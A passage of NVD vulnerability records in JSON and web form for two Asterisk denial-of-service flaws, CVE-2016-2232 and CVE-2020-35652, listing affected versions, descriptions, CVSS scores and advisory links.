              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A62DFFE-637B-4911-B3B4-6DA4053CBDBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "96C7950F-41D1-46B5-BA62-E8450CB81244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C9A32ECC-E208-4834-8EF7-FEF7A3495041",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F7C5D35-A6AE-4A2E-98C5-CB58FF22AF08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AA3E0D41-2E6E-4294-8E56-1A738A7F9AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D16109B8-4CDF-46FC-9AD9-A158E532791B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F5EE428-98FF-42BC-9F61-311327B8F610",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBA2FD08-D761-410F-9804-A76F0DD77349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74B34C21-D90B-4E32-BBA6-7773DB663F18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D3AF185-7AC6-491E-9BE0-8ECD163A3E77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "90996D49-5731-4F7D-9DBE-D0599A5D85A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D3C91C8D-707D-443D-985F-FA3EDB181208",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "25E7F7F5-E85A-4720-B5C9-2B776B04D904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8DD16DF-C47C-41CF-8CDE-C365103262A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "43C06F98-62F4-4008-A463-2791BEDF6DED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B98A2EA6-DCC6-4F8B-B132-6692AED16CF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "672EDC0E-D70A-4BB0-B7FE-5D422C737862",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C779E0D4-0375-4BE8-9667-A32C68B66D60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:standard:*:*:*",
              "matchCriteriaId": "6DEF3D58-73E0-402A-A15F-05CA72B5B288",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8E9E50F8-0123-4C9E-88E1-5DCE08770B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F7C605A3-8517-4215-9AD3-980D587B22DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "866815AE-D1FE-460C-A3BC-70C251655C1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "44746060-BC6F-4E6D-BA81-61623B2D27FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47548ADE-255A-4355-BD06-1FEF134C1620",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "ABCFC4D9-8054-4F42-BE7E-5092F6648F95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "84A7DBB5-999C-4AE8-BC5D-F0C5F77957DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB1EA7C5-CE37-4A7E-AF81-636228F3BA53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "905722CB-4B6C-4849-88CD-22E972432E36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10823FD4-D618-4050-91D7-CBDE69BC570D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "9365B811-5620-42F0-9400-5EA49361D2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:lts:*:*:*",
              "matchCriteriaId": "BB47EA31-CF9D-4752-804B-7804151EC87C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:lts:*:*:*",
              "matchCriteriaId": "A1C9B744-1745-4E9D-A2DE-4659295508D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "066453F2-A77F-4E82-8C91-AC17FAA21A89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA74CB86-72C3-4913-8EB6-3BBA1D3BC65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0C6CF412-290C-4524-9AFE-D58A85183864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "BA3211EE-E305-4247-AA2E-910E48CBCDF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F68ED1E-8D2B-4AEE-B5DE-FD50338BA82D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EA9F296A-4932-4EA4-8B38-80856A9D6374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B40673A6-2980-440A-B78E-D5C7095E3FA6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3 allow remote authenticated users to cause a denial of service (uninitialized pointer dereference and crash) via a zero length error correcting redundancy packet for a UDPTL FAX packet that is lost."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 1.8.x, 11.x en versiones anteriores a 11.21.1, 12.x y 13.x en versiones anteriores a 13.7.1 y Certified Asterisk 1.8.28, 11.6 en versiones anteriores a 11.6-cert12 y 13.1 en versiones anteriores a 13.1-cert3 permiten a usuarios remotos autenticados causar una denegaci\u00f3n de servicio (referencia a puntero no inicializado y ca\u00edda) a trav\u00e9s de un error de longitud cero corrigiendo la redundancia de paquetes para un paquete UDPTL FAX que se ha perdido."
    }
  ],
  "evaluatorComment": "\u003ca href=\"http://cwe.mitre.org/data/definitions/476.html\"\u003eCWE-476: NULL Pointer Dereference\u003c/a\u003e",
  "id": "CVE-2016-2232",
  "lastModified": "2024-11-21T02:48:05.540",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-02-22T15:59:01.190",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-003.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1034931"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1034931"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-01-29 08:15

Modified

2024-11-21 05:27

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header.

References

URL	Tags
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2020-003.html	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2020-004.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29191	Exploit, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29219	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2020-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2020-004.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29191	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29219	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DA452364-C114-412B-A2E4-192C1FAC38D6",
              "versionEndExcluding": "13.38.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "221D371E-558E-4381-A405-190B9AA04250",
              "versionEndExcluding": "16.15.0",
              "versionStartIncluding": "14.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9A4C2E56-5EA4-4048-88CE-3882D201028B",
              "versionEndExcluding": "17.9.0",
              "versionStartIncluding": "17.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5E927E6-DBA3-4FD6-BA28-F13C3D837197",
              "versionEndExcluding": "18.1.0",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en el archivo res_pjsip_diversion.c en Sangoma Asterisk versiones anteriores a 13.38.0, versiones 14.x hasta 16.x versiones anteriores a 16.15.0, versiones 17.x anteriores a 17.9.0 y versiones 18.x anteriores a 18.1.0.\u0026#xa0;Puede ocurrir un bloqueo cuando es recibido un mensaje SIP con un encabezado History-Info que contiene un tel-uri, o cuando es recibida una respuesta SIP 181 que contiene un tel-uri en el encabezado Diversion"
    }
  ],
  "id": "CVE-2020-35652",
  "lastModified": "2024-11-21T05:27:45.820",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
